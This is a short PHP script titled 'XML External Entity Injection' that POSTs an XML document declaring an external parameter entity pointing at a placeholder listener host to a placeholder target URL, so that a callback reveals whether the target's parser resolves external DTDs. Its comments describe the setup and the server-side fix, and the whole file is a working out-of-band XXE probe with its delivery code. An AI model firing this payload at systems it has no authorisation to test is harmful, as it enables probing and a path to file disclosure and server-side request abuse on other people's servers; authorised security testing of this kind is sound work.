XML External Entity Injection
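<?php
/**
 * Out-of-band XML External Entity (XXE) check.
 *
 * POSTs an XML document whose DOCTYPE declares an external parameter entity
 * (%dtd;) to $URL. If the XML parser on the receiving side resolves external
 * DTDs, it issues an HTTP request to the host named in the SYSTEM identifier,
 * which is then visible on that host (the author watches for it with tcpdump
 * on the listening server).
 *
 * Before running:
 *   - Replace <IP_ADDRESS> with your listening server.
 *   - Replace target with the server you want to test.
 *
 * A callback means the parser under test loads external entities/DTDs; the
 * server-side remedy is to configure that parser to reject DOCTYPE
 * declarations or to disable external entity resolution.
 */

$xml_data = '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottage [
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
%dtd;]>';
// Commented-out general-entity variant left by the author:
//<!ENTITY xxe SYSTEM "http://target/">]>

$URL = "https://target/";

$ch = curl_init($URL);
if ($ch === false) {
    error_log("curl_init failed for {$URL}");
    exit(1);
}

curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xml_data);
// Capture the response body in $output instead of echoing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$output = curl_exec($ch);
if ($output === false) {
    // A transport failure (DNS, TLS, timeout) means the document never reached
    // the parser, so "no callback seen" must not be read as "not affected".
    error_log('Request failed: ' . curl_error($ch));
}

// Explicit terminator: the original relied on the closing tag to end this statement.
curl_close($ch);
?>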